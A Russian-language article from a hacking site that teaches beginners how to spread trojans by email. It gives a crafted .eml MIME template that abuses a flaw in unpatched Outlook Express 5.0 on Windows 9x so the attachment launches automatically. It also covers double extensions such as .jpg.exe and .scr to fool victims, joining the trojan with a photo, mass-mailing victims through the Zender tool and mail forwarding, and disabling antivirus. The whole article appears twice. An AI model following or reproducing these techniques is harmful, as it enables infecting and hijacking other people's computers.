Эффективный способ впаривания троянов — HackZona.Ru
Эффективный способ впаривания троянов
Эффективный способ впаривания троянов
Тип статьи:
Со старой ХакЗоны.
Источник:
Сразу предупреждаю что статья написанна для новичков в этом деле, поэтому не надо кричать и махать руками что типа всё это знаем и умеем, может вы и знаете и умеете, а другие только начинают учится и думаю им это будет полезно знать. Я знаю что об этом статьи уже писались и поэтому не претендую на полное авторство, но в тех статьях которые я видел всё описывалось скупо, отдельно, несвязанно с друг другом и неподробно, я же попытаюсь всё конкретизировать, обобщить и разложить по полочкам (даже разжевать:) так чтоб любой более менее начинающий юзверь мог во всё врубится. И так что для этого понадобится:
* The Bat! один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик, ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты, а его впарят тебе, причём без твоего согласия).
* Zender спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.
* Троян — в принципе любой, желательно чтоб не палящийся был.
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то.J).
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их… да да WindowsХреновоРаботает ещё мало кто поставил. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-). И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск :) ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» :), но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП, Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну… нам это надо. Какой шанс что кто то откроет и запустит к себе твою коняшку… правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо… ну хорошо же чтоб так было и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml, затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:
From: SuperMegaXaker <[email protected]>
To: <[email protected]>
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type=«multipart/alternative»;
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset=«iso-8859-1»
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=«Troyan.jpg.exe
Content-Transfer-Encoding: base64
Content-ID:
На этом месте будет файл трояна в base-64 кодировке.(внешне будет выглядеть как большой и ровный блок текста )
--====_ABC1234567890DEF_====
--====_ABC1234567890DEF_====--
Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА
Это и есть сам файл трояна, просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить, не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке.(внешне будет выглядеть как большой и ровный блок текста)
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то, но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From, To и Subject на нужные вам, и ещё поменяйте в строке Name=»имя_трояна.exe" на что нибудь другое типа name=«my_sexy_foto.jpg.exe». То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла, которое получит жертва. Кстати нам так же пригодится и Joiner, склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe, просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится. Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt. Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например [email protected] Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится), так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так… заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы, а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском у меня всё равно Бат стоит :))))). Удачи.
* The Bat! один из лучших почтовых клиентов, (как у тебя его ещё нет, давай сейчас же дуй в какой нить поисковик, ищи его, скачивай, устанавливай и сноси нафиг свой ОутглюкЕхпресс, а то трояна впаришь не ты, а его впарят тебе, причём без твоего согласия).
* Zender спецальная программа для посылки писем с трояном в дыру Оутглюка (качать с www.hack-it.by.ru/soft), о ней чуть ниже и поподробнее.
* Троян — в принципе любой, желательно чтоб не палящийся был.
* Ну и ещё какой нить joiner, их сейчас много развелось так что сами выбирайте, и желательно чтоб он умел менять иконки и закрывать анитивирусы и фаирволы ( и всего то.J).
И так способ этот рулит в Windows 95-98SE (без заплаток) и если установлен основной почтовый клиент это их же OutlookExpress 5.0, они сейчас пока наиболее распространены и в основном большинство народа юзает их… да да WindowsХреновоРаботает ещё мало кто поставил. Так что шансы нарваться на таких у вас большие (небось сами на этом софте то сидите ;-). И так как вы раньше рассылали ламерам трояна, брали просто атачили к письму файл с троянам, писали какой нить текст в письме чтоб жертве захотелось открыть его, рассылали по спам листам и надеялись на то что найдётся жертва которая окажется полным ламерьём и откроет приатаченный файл и вот ты уже летишь по халявному инету или форматируешь ламеру диск :) ( а может и идёшь по тёмному коридору заложив руки за спину в сопровождении дяденьки с отдела «Рэ» :), но щас народ уже в основном учёный пошёл и просто так файлы пришедшие почтой не открывает, а для начала бережно сохраняет на диск и потом с упоением насилует их всякими там АВП, Докторами Вьебами и Нортонами, а потом уже думает открывать его или нет. Ну… нам это надо. Какой шанс что кто то откроет и запустит к себе твою коняшку… правильно шанс просто мизерный. Поэтому то нам надо сделать так чтоб файл в письме запустился автоматически как только жертва получит это письмо… ну хорошо же чтоб так было и не надо ни кого уговаривать ( ещё раз подчеркну что рулит всё в Win9x и OE 5.0 ). И так для начала создаём файл mail.eml, затем открываем его в любом текстовом редакторе (желательно в WordPad) и вставляем в него такую вот запись:
From: SuperMegaXaker <[email protected]>
To: <[email protected]>
Subject: !!!!!Poluchai gad troyana!!!!
MIME-Version: 1.0
Content-Type: multipart/related;
type=«multipart/alternative»;
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset=«iso-8859-1»
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name=«Troyan.jpg.exe
Content-Transfer-Encoding: base64
Content-ID:
На этом месте будет файл трояна в base-64 кодировке.(внешне будет выглядеть как большой и ровный блок текста )
--====_ABC1234567890DEF_====
--====_ABC1234567890DEF_====--
Кстати в проге zender уже лежит пример готового файл Mail.eml с уже вложенным туда трояном. Открыв его также в текстовом редакторе вы и увидете как в нём будет выглядит сам файл трояна тесктом, он там как раз и будет в base-64 кодировке. Выглядеть это будет примерно вот так:
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAA
AAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAgAAAAA
4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdC
BiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAB
QRQAATAEDAGVj+zwAAAAAAAAAAOAADwELAQED
ABAAAAAQAAAAYAAA4HkAAABwAAAAgAAAAABAAA
AQAAAAAgAAAQAAAAAAAAAEAAAAAAAAAACQAAAA
EAAAAAAAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAA
ABAAAAAAAAAAAAAAAKSDAAB0AQAAAIAAAKQDAA
AAAAAAAAAAAAAAAAAAААА
Это и есть сам файл трояна, просто он в кодировке base-64. Но только не открывайте этот файл вашим Оутглюком, так как у автора проги видно есть «чуство юмора» и он вместо того чтоб вложить в это письмо для примера какую-нить безобидную программку. вложил туда настоящего своего трояна и если вы это письмо откроете своим Оутглюком то он сразу автоматически запустится у вас на компе. Ну а вы думаете почему я вас Bat поставить просил. Да и ещё установите в Бате в настройках ассоциации файлов .eml с Батом и тогда такие файлы у вас будут открыватся не в Оутглюке а в Бате и вы сможете их спокойно открывать и смотреть, так как в Бате такого бага как в Оутлюке нету. И так письмо у нас есть, теперь в него надо вставить трояна. И что надо сделать чтобы вставить в ваше в письмо mail.eml уже сконфигурированного вами вашего родного трояна и как узнать как он выглядит в base-64 кодировке. Для этого нам и пригодится Бат. Открываем его. В нём создаём новое письмо, присоединяем к нему вашего трояна и жмём на кнопочку отправить, не важно кому так как мы его отправлять ни куда не собираемся, письмо соответственно попадёт в папку «Исходящие» (это если у вас Бат русифицирован), но нам оно там нам не нужно поэтому берём и перемещаем его в папку «Входящие» (просто перетаскиваем мышкой), затем открываем его там щёлкая по нему два раза и ищем в открывшемся окне вверху меню «Спецальное» а в нём выбираем «исходный текст» и увидим наше письмо токлько файл с нашим трояном будет там как раз в нужной нам base-64 кодировке, я уже говорил как он будет выглядеть (внешнее похоже на большой блок ровного и непрерывного текста), так вот выделяем именно только этот текст и копируем его в буфер обмена (для тех кто не знает кто это такая «буфер обмена» то копируйте в простой текстовой документ :). Затем открываем наше уже заготовленное письмо mail.eml в текстовом редакторе и вставляем этот текст заместо того который я уже писал выше:
На этом месте будет файл трояна в base-64 кодировке.(внешне будет выглядеть как большой и ровный блок текста)
Саму эту надпись конечно же удаляем!!! Сории что объясняю как даунам каким то, но ведь блин найдутся те которые так и не врубятся куда что и заместо чего вставлять. Так же можете взять пример письма из проги Zender (там он называется Mail.eml) и так же открыв его в тестовом редакторе удалить из него только текст (в base-64 кодировке) файла с трояном автора и вставить туда текст (в base-64 кодировке) уже своего сконфигурированного трояна. Кстати не забудьте поменять в файле строки From, To и Subject на нужные вам, и ещё поменяйте в строке Name=»имя_трояна.exe" на что нибудь другое типа name=«my_sexy_foto.jpg.exe». То что вы там поставите и будет отбражаться в полях письма From, To, Subject и имя приатаченного файла, которое получит жертва. Кстати нам так же пригодится и Joiner, склейте с трояном какую нить фотку, потому что не у всех может Оутглюк стоять и когда жертва будет открывать файл уже самостоятельно ей предстанет перед глазами эта фотка, а ваш троян в это время будет делать своё грязное дело. Да, ещё за место расширения файла .exe можно поставаить .scr это расширение у скринсейверов (программ-заставок) но действовать будет так же как и с .exe, просто таким образом можно немного усыпить бдительность жертвы. Сохраняемся, и всё письмо с трояном mail.eml готово. Теперь если открыть это письмо Оутглюком то файл автоматически запустится. Теперь о том как пользоваться Zenderom для отсылки этого письма, потому как обычной почтовой програмой его не отошлёшь так как она поменяет все заголовки на другие и троян в письме уже автоматически не запустится. Для начала прочтите там файл с описанием. Если не поняли то объясню на пальцах. В начале кладёте ваше письмо mail.eml в папку с Zenderom. Там же в папке есть файл user.txt. Он нам и нужен для рассылки. В первой строчке после from= пишем любой существующий адрес на каком нить бесплатном мыльном сервисе, главное чтоб он там существовал и чтоб сервак имел smtp сервер. Ну например [email protected] Он в принцепе не имеет большого значения и нужен для того чтоб прога могла через этот мыльный сервак и его smtp сервер разослать письмо уже на адреса ваших жертв. А вот на следущей строчке уже просто пишите адреса ваших жертв, их может быть сколь угодно много главное чтоб они все начинались с новой строки. Теперь запускаете саму прогу zender.exe и она разашлёт ваше письмо с трояном по всем этим адресам. Кстати у проги нет интерфейса ( т.е. ни каких окошечек у вас не появится), так что следить за тем как она рассылает письмо можно будет по самому соединению (значок который мигает у вас в трее когда вы подключаетесь к инету). Когда она разошлёт письмо по всем указаным вами адресам то появится окошко с надписью All done это значит что письмо разослано. А если вы рассылаете не на один адресс, а например по спам листу на несколько десятков адрессов, то чтоб не ждать пока прога разошлёт файл по всем этим адрессам и не терять много драгоценного время в инете делайте так… заведите себе например на рамблере любое мыло и поставтье на нём переадресацию на имеющиеся у вас многочисленные адресса жертв, а в файле user.txt заместо адрессов жертв напишите всего один адрес этого вашего мыла на рамблере и всё, теперь запустите прогу и она пошлёт письмо на этот адресс, а уж сервак рамблера сам сделает за вас всю грязную работу и разашлёт письмо по всем адресам которые вы указали в переадресации. Так что теперь эфективность рассылки трояна у вас значительно повысится по сравнению с тем как вы его раньше рассылали простым дедовским способом :)))). Так как ещё много тех кто сидит на Вынь9х и Отглюках :). Кстати щас само письмо mail.eml сосотавленное таким вот образом чтоб автоматически запускался приатаченный к нему файл определяется многими антивирусами как троян даже если вы туда ещё ни кого трояна и не вставляли, у меня например мой ДокторВъеб ругается на это письмо что типа это troyanIframe :)))), правда если письмо лежит в каком zip архиве то он на него молчит, хотя ведь сами архмвы он шмонать умеет хорошо, вот так то, так что на время составления письма придётся выгружать ваши антивирусные мониторы, а то ведь работать нормально не дадут :)). Ну вот и всё. По моему всё понятно рассказал. У кого будут какие вопросы пишите (можете даже такие вот письма с автозапуском у меня всё равно Бат стоит :))))). Удачи.
2 комментария